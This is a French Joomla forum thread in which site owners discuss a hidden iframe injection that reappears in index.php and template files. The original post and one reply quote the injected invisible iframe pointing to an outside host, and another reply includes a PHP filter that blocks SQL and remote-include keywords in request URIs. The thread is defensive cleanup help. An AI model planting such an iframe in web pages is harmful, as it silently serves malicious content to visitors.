Joomladay francophone 2018 à Paris 18 et 19 mai

iframe injection

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] iframe injection

    bonjour depuis ce matin j'ai un code qui s'ajouter dans mon site :
    <iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsi57" width=125 height=125 style="visibility: hidden"></iframe>
    apres <body>

    j'ai vérifie la base de données et j'ai pas trouvé je code <iframe

    est que quelqu'un peut m'aider à) résoudre ce problème

    merci encore

  • #2
    aïe

    Salut,

    Mauvaise nouvelle en effet si tu n'as pas de sauvegarde de ton site et de ta base de données puisque cette ligne se reproduit dans tous les fichiers index des sites. la seule solution est de faire une recherche sur l'ensemble des fichiers via notepad++ par exemple et de sortir tous les fichiers sur lesquels la ligne est écrite.
    Sur le site infecté que j'ai vu aujourd'hui la table des users avait également été vidée et la plupart des composants ne fonctionnaient plus non plus

    la ligne en question était en effet du type de celle-ci :
    Code PHP:
    <iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsixx" width=125 height=125 style="visibility: hidden"></iframe
    Moralité il faut installer un système de protection contre les injections de code comme crawltrack, utiliser le fichier htaccess, faire des sauvegardes régulières.....
    adishatz, érix
    https://www.agerix.fr/?utm_source=forumjoomlafr- Agerix partenaire du JoomlaDay 2018 : https://www.joomladay.fr/
    Vous aimez ce forum ? Aidez-nous à le maintenir en adhérant à l'AFUJ : http://www.joomla.fr/component/compr...ers?Itemid=825

    Commentaire


    • #3
      Bonjour,
      les fichiers à déverminer en priorité sont les index.php de la racine, du template et de administrator. Il peut en trainer aussi dans certains composants comme Agora. Il y a moins d'urgence pour les index.html mais il faudra le faire.
      MAIS en priorité lance une analyse sur ta machine. Il y a une chance non nulle que tu aies une infection et que le hack soit fait depuis là, en utilisant les codes FTP que tu as stockés dans Filezilla.
      Donc télécharge et lance par exemple un Hijackthis et poste les logs sur un forum spécialisé pour te faire aider à nettoyer ta machine.
      Si tu es pressé, utilise un autre poste pour modifier ton compte FTP et nettoyer tes fichiers index.
      Et arrête de stocker tes mots de passe dans ton client FTP...
      Schtroumpfe toi le Schtroumpf t'aidera.
      Je ne schtroumpfe pas aux demandes de schtroumpf par MP.

      Commentaire


      • #4
        j'ai pas de virus dans mon pc, mais je veux savoir par ou il a pu placer son script et ou je peut le trouver ou bien le bloquer (hier j'ai remis les anciens fichiers mais ce matin je viens de voir qu'il a une autre fois pu modifier mes pages index.php et templates )

        Commentaire


        • #5
          Bonjour,
          j'ai pas de virus dans mon pc
          tu voulais sans doute écrire :
          j'ai pas trouvé de virus dans mon pc
          nuance...
          Juste parce que pour l'instant tu n'as pas d'autre réponse - et des fois que... - change tes mots de passe FTP et arrête de les mémoriser dans Filezilla...
          Schtroumpfe toi le Schtroumpf t'aidera.
          Je ne schtroumpfe pas aux demandes de schtroumpf par MP.

          Commentaire


          • #6
            Salut,

            Envoyé par abdeladim7
            j'ai pas de virus dans mon pc, mais je veux savoir par ou il a pu placer son script et ou je peut le trouver ou bien le bloquer (hier j'ai remis les anciens fichiers mais ce matin je viens de voir qu'il a une autre fois pu modifier mes pages index.php et templates )
            Est-ce que tu as mis ton htacces comme je te l'avais conseillé ? Je le répète mais Crawltrack ou sh404sef sont également des outils utiles pour contrer ce type d'attaque.

            Envoyé par Grand Schtroumpf
            change tes mots de passe FTP et arrête de les mémoriser dans Filezilla...
            aussi !
            adishatz, érix
            https://www.agerix.fr/?utm_source=forumjoomlafr- Agerix partenaire du JoomlaDay 2018 : https://www.joomladay.fr/
            Vous aimez ce forum ? Aidez-nous à le maintenir en adhérant à l'AFUJ : http://www.joomla.fr/component/compr...ers?Itemid=825

            Commentaire


            • #7
              Apparement ça à l'air d'être à la mode parce que j'ai également le même problème depuis quelques jours.

              Il faut toujours remplacer d'un coup c'est sans doute le plus simple.

              L'enseignement reçu..

              -Ne pas hésiter à passer un Malwarebytes ou consors en profondeur > parce qu'autres ne m'ont rien trouvé
              -Une sauvegarde totale de son site avant de le remettre en ligne
              -Une sauvegarde de la bd (tient d'ailleurs sur la 1.0.15 y'avait un plugin de sauvegarde auto de la bd journalier très pratique)
              -Eviter de sauvegarder ses pass FTP
              -Un bon ht access bien parametré

              Et ça devrait limitter les attaques

              Par rapport aux CHMOD en combien doivent être justement les index.php ?

              Commentaire


              • #8
                Bonjour,
                Par rapport aux CHMOD en combien doivent être justement les index.php ?
                J'ai testé, pour ce genre d'attaque le chmod n'apporte rien, puisque la bête arrive avec un compte FTP qui a des superpouvoirs...
                Schtroumpfe toi le Schtroumpf t'aidera.
                Je ne schtroumpfe pas aux demandes de schtroumpf par MP.

                Commentaire


                • #9
                  bonjour, voila un site http://www.cccsunbeach.ma/ ou j'ai utilisé sh404sef et dans le weekend j'ai remets les anciens fichiers mais ce matin la même chose (je ne sais pas d'où viens l'attaque) j'ai déjà bloqué :

                  if (
                  ereg('select%20',strtolower($_SERVER['REQUEST_URI'])) ||
                  ereg('union',strtolower($_SERVER['REQUEST_URI'])) ||
                  ereg('insert',strtolower($_SERVER['REQUEST_URI'])) ||
                  ereg('update',strtolower($_SERVER['REQUEST_URI'])) ||
                  ereg('from',strtolower($_SERVER['REQUEST_URI'])) ||
                  ereg('where',strtolower($_SERVER['REQUEST_URI'])) ||
                  ereg('=http',$_SERVER['REQUEST_URI']) ||
                  ereg('option=http',$_SERVER['REQUEST_URI']) ||
                  ereg('gif\?cmd',$_SERVER['REQUEST_URI']) ||
                  ereg('gif&cmd',$_SERVER['REQUEST_URI']) ||
                  ereg('jpg\?cmd',$_SERVER['REQUEST_URI']) ||
                  ereg('jpg&cmd',$_SERVER['REQUEST_URI']) ||
                  ereg('txt\?cmd',$_SERVER['REQUEST_URI']) ||
                  ereg('txt&cmd',$_SERVER['REQUEST_URI']) ||
                  ereg('txt\?',$_SERVER['REQUEST_URI']))
                  {

                  quelqu'un a du nouveau sur ce probleme

                  Commentaire


                  • #10
                    Re,
                    est-ce que tu as fait ça depuis le temps qu'on te le répète (en général, c'est sympa de répondre aux gens qui essayent de t'aider, même si tu as l'impression qu'il racontent des c...ies) :
                    change tes mots de passe FTP et arrête de les mémoriser dans Filezilla...
                    Schtroumpfe toi le Schtroumpf t'aidera.
                    Je ne schtroumpfe pas aux demandes de schtroumpf par MP.

                    Commentaire


                    • #11
                      au secour

                      Bonjour tlm,

                      j'ai essayé de faire la manip que vous m'avez indiqués, mais le haker est arrivé a changer les index, j'ai fais un scan aux fichiers du site mais j'ai rien trouver ,

                      en tt cas je vous remercie pour le temps que vous m'avez accordé.

                      Salutations

                      Commentaire


                      • #12
                        Salut,

                        à mon tour de ne pas comprendre : tu n'as pas de sauvegarde de ton site et de la base de données ? Je veux dire d'avant l'attaque ? Si tu en as une, efface tout ce que tu as sur ton ftp, sur la base de données, change les mots de passes et réinstalla ta sauvegarde au propre en suivant les conseils de sécurisation donné sur les messages précédents.
                        adishatz, érix
                        https://www.agerix.fr/?utm_source=forumjoomlafr- Agerix partenaire du JoomlaDay 2018 : https://www.joomladay.fr/
                        Vous aimez ce forum ? Aidez-nous à le maintenir en adhérant à l'AFUJ : http://www.joomla.fr/component/compr...ers?Itemid=825

                        Commentaire


                        • #13
                          Salut Grand Schtroumpf,

                          Envoyé par Grand Schtroumpf Voir le message
                          change tes mots de passe FTP et arrête de les mémoriser dans Filezilla...
                          Je reviens sur ton conseil car suite à un site infecté j'ai pris la main sur la machine du propriétaire, fais toutes les analyses dessus et ai regardé bien évidemment sa config Fillezila. Il se trouve que les identifiants ftp n'était pas conservé dans Filezilla, je m'interroge donc sur ce fait.
                          Par contre, et c'est peut-être ce que tu voulais dire, j'ai vu que dans sa configuration de site qu'il avait mémorisé les login/mot de passe. C'était ça dont tu parlais ?
                          adishatz, érix
                          https://www.agerix.fr/?utm_source=forumjoomlafr- Agerix partenaire du JoomlaDay 2018 : https://www.joomladay.fr/
                          Vous aimez ce forum ? Aidez-nous à le maintenir en adhérant à l'AFUJ : http://www.joomla.fr/component/compr...ers?Itemid=825

                          Commentaire


                          • #14
                            Bonjour,
                            non, le cas que j'ai croisé c'était bien users+mots de passe mémorisés dans Filezilla. Mais il subsite un doute puisque on a procédé simultanément au nettoyage de la machine, au changement des comptes FTP, au remplacement de Filezilla... Mais les tentatives de protection par CHMOD on été vaines, ce qui va bien avec la piste du FTP... Peut-être que le troyan lisait les coordonnées au passage ?
                            En tout cas Joomla n'est pas en cause, trois sites ont été touchés dont seulement un Joomla.
                            Ce n'était pas tout à fait la même injection, ça ressemblait à celle-ci : http://forum.joomla.fr/showthread.php?t=94740
                            Schtroumpfe toi le Schtroumpf t'aidera.
                            Je ne schtroumpfe pas aux demandes de schtroumpf par MP.

                            Commentaire


                            • #15
                              ok j'ai également ceci sur un de mes sites, j'ai installé crawltrack et j'ai bien l'impression que le script ne reconnais pas l'injection, il reconnais les hits d'un robot sur le serveur mais ne le considère pas comme dangereux., a moins qu'il s'agisse d'un autre robot qui est passé au même moment mais bon

                              C'est dingue le nombre de personne que j'ai vue dernièrement qui ont chopé cela . J'ai un site joomla qui à était infecté j'ai remis tout à zéro avec des nouveaux pass filezilla et admin,j'en ai profité pour tout refaire sur le site, donc un site tout neuf, sans rien dessus, ni de ver. Se qui m'inquiète c'est que sur le même serveur j'ai un autre site, celui là en html/css qui est infecté par ce " ver" iframe et qui est sur le même serveur.... Le lendemain, le troisième site que j'étais en train de développer sous joomla à eu ce ver ifram aussi, je tyiens à préciser que ce dernier site est sur un autre serveur ( OVH )
                              Autre point à préciser, il semblerait que ce ver est détecté que par Avast et pas par Nod32, Mcafee , google le considère comme dangereux puisqu'il met le site avec un bandeau rouge quand le site est infecté.

                              En clair je ne comprend pas s'agit t'il d'un hacker ou un d'un programme "ver" "virus" qui s'attaque aux page index automatiquement en injectant des lignes de code.

                              Autre chose, moi je n'ai jamais trouvé de ligne de code Ifram..... en question sur mes pages.
                              J'avous que sa fait trois jours que j'essaye de trouver une solution pour le deuxième site et sa devient difficile.
                              infographiste freelance
                              apprendre la guitare

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins
                              Travaille ...
                              X